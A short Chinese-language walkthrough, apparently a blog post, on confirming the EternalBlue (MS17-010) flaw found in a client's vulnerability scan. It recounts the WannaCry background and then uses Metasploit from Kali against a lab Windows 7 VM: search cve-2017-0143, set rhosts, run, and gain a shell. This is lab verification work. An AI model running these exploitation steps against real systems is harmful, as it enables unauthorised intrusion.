1、漏洞介绍 永恒之蓝,也称之为Eternal Blues。2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒, 英国 、 俄罗斯 、整个 欧洲 以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 2、漏洞利用 2.1 漏扫报告检测到永恒之蓝漏洞 在本次给客户做的漏扫报告中,有多个MS17-010漏洞,客户怀疑有可能是误报,想验证下。 2.2 环境搭建使用的工具: Vmware workstation、目标机win7 旗舰版64位操作系统、攻击测试机kali 2022。 首先我们把环境准备好。 我们的win7系统的IP是192.168.56.137,kali系统是192.168.56.134。 win7: kali: 我们在win7的桌子建立一个key的txt文件,做为验证文件。 2.3 漏洞利用 在kali系统中输入msfconsole进入metaspolit。 搜索cve编号:search cve-2017-0143 选择0 设置攻击目标:set rhosts 192.168.56.137 执行:run 在返回的控制台界面输入ipconfig,可以看到我们已经接入到了目标机win7系统。 我们找到我们在win7系统桌面上放的验证文件:
3、漏洞验证 3.1 在2.3步骤时选择3。 可以看到系统存在该漏洞。 3.2 使用Eternal Blue工具 在IP Range里输入目标主机,点击“SCAN”进行检测。
4、B站链接 |